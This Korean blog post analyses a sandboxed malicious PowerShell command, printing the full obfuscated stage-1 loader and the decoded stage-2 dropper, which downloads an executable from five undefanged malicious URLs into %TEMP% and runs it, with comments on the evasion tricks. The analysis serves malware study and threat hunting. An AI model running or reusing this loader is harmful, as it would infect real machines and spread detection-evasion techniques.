
Powershell Script 난독화 (3)

lucykorea414 2024. 4. 29. 18:22

https://www.hybrid-analysis.com/sample/ceb72d57957beec8e3a9e9dea3ea0bf16ab92db0f69b793210fa017f19b90d0d?environmentId=100

 

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'index.html.17'



 

 

샌드박스 보고서의 프로세스 목록을 보면 다음과 같이 powershell.exe가 실행된 것이 보인다.

 

이 명령줄을 복호화하면 다음과 같이 아직 난독화가 한 겹 더 남아 있는 1차 스크립트가 나온다.

# Stage-1 loader exactly as captured from the powershell.exe command line.
# The call operator `&` is applied to a string assembled at run time: on a
# default Windows install $env:PUBLIC is "C:\Users\Public", so [13] is 'i'
# and [5] is 'e'; appending 'x' yields "iex" (Invoke-Expression) without the
# cmdlet name ever appearing in the script.
# Its argument is the real payload written as decimal char codes, each pair
# separated by one of the ten delimiter characters '&!Kzd}nQ;G'. .Split() on
# that character set, [char][int] per token and -Join rebuild the script text
# in memory, and iex then executes it. The random upper/lower casing of
# variable, property and cmdlet names is noise aimed at case-sensitive
# signatures and has no effect in PowerShell.
# NOTE(review): the rebuilt script downloads and runs an executable. To
# recover it safely, evaluate only the inner ( -JoiN ( ... ) ) expression
# (drop the leading `& ( ... )`) and do so in an isolated analysis VM.
& ( $ENv:pubLiC[13]+$eNV:PUbLIC[5]+'x')( -JoiN ( '36d119&115;99&114K105&112K116d32;61d32&110}101K119!45K111z98!106n101;99G116&32d45&67G111z109Q79G98!106}101;99!116n32G87!83&99n114Q105K112&116;46;83G104K101Q108z108n59z36Q119d101&98G99&108z105!101;110K116;32n61}32}110d101d119}45d111K98!106z101z99d116G32&83K121K115;116!101n109Q46&78G101;116!46n87&101;98z67Q108}105d101&110&116;59;36&114K97G110n100n111n109&32z61n32}110d101K119!45z111;98!106;101G99Q116d32G114;97&110z100Q111z109G59Q36K117Q114d108}115K32n61;32K39n104}116;116;112z58!47K47;112!105;110}103d115K116K97d116}101d46G99!111}109&47d66z47Q44G104G116G116Q112Q58Q47z47K99!108Q97z110G99n111}109&115Q46}99n111z109Q47G118Q76Q103K75d116G119n109n65d76Q47;44K104&116}116n112}58z47d47d107G101K118G105K110}103n114K101z97G118;101K115G46n99z111d109z47z100&82!47;44}104d116Q116Q112&58z47;47z116z104z105d110;107G45d102&97d99}116z111d114!121}46K99&104!47;111!73;82}106z117}110n119&81&110!47Q44;104!116Q116Q112&58n47&47&109z111z98z105G108&105!122}114d46!99&111z109n47&117;71z102d68Q77}69n47&39}46;83Q112K108n105z116d40!39G44G39;41z59n36!110K97z109Q101G32!61z32!36n114n97&110z100&111}109}46z110n101K120!116d40n49Q44z32&54z53Q53d51;54;41&59}36Q112!97n116&104;32z61!32!36G101n110Q118Q58}116K101;109z112G32z43K32n39Q92!39Q32!43G32z36Q110G97K109n101d32}43n32}39K46&101G120G101d39d59n102d111Q114!101!97d99K104&40n36!117!114z108G32&105d110!32G36d117n114z108n115z41!123&116}114z121;123K36n119z101!98d99;108;105n101n110d116d46d68&111K119Q110Q108!111n97&100d70n105!108z101n40d36!117K114Q108K46!84z111z83n116G114&105&110n103G40K41Q44n32!36G112z97;116z104}41G59z83;116;97n114;116&45G80&114z111!99}101z115G115Q32;36Q112d97Q116}104!59z98Q114&101G97K107K59;125Q99Q97&116d99&104d123z119&114z105;116K101G45!104K111;115;116G32!36K95&46;69K120&99K101&112n116G105;111}110!46!77K101G115K115&97;103!101G59&125!125'.sPlIT( '&!Kzd}nQ;G' )|% {([ChAR][int] $_)} ))

 

powershell ise에서 앞의 `& ( $ENv:pubLiC[13]+$eNV:PUbLIC[5]+'x')` 부분을 지우고 나머지 표현식만 실행하면 다음과 같이 난독화가 풀린다. `$env:PUBLIC`이 기본값 `C:\Users\Public`일 때 `[13]`은 `i`, `[5]`는 `e`이므로 이 접두부는 `iex`(Invoke-Expression)다. 즉 이를 지우지 않고 그대로 실행하면 복호화된 스크립트(원격 실행 파일 다운로드 및 실행)가 실제로 동작하므로, 반드시 접두부를 지운 뒤 격리된 분석용 VM에서만 실행해야 한다.

# Stage-2 script as recovered by evaluating the decoder expression above.
# What this one line does, in order:
#  - creates a WScript.Shell COM object (assigned to $wscript but not used
#    anywhere in this line) and a System.Net.WebClient;
#  - keeps five download URLs in $urls, obtained by splitting one string on ',';
#  - draws a random integer in [1, 65535] (Random.Next upper bound is
#    exclusive) and uses it as the drop name %TEMP%\<n>.exe;
#  - walks the URLs in order: DownloadFile to that path, Start-Process on the
#    dropped file, then `break` after the first URL that succeeds. A failed
#    download throws into the catch, which only prints the exception message,
#    so Start-Process is never reached for that URL and the loop continues
#    with the next one.
# NOTE(review): the spaces in `keving reaves.com` and `$webclie nt` are
# line-wrap artifacts of the paste; the decoded string is contiguous
# (kevingreaves.com, $webclient). The five hosts and a %TEMP%\<1-65535>.exe
# dropped-then-executed by powershell.exe are the indicators to hunt for;
# the URLs here are not defanged, so defang them before sharing.
$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://pingstate.com/B/,http://clancoms.com/vLgKtwmAL/,http://keving reaves.com/dR/,http://think-factory.ch/oIRjunwQn/,http://mobilizr.com/uGfDME/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclie nt.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

 

보기 좋게 문장 단위로 줄을 나누어 정리하면 다음과 같다.

 

 
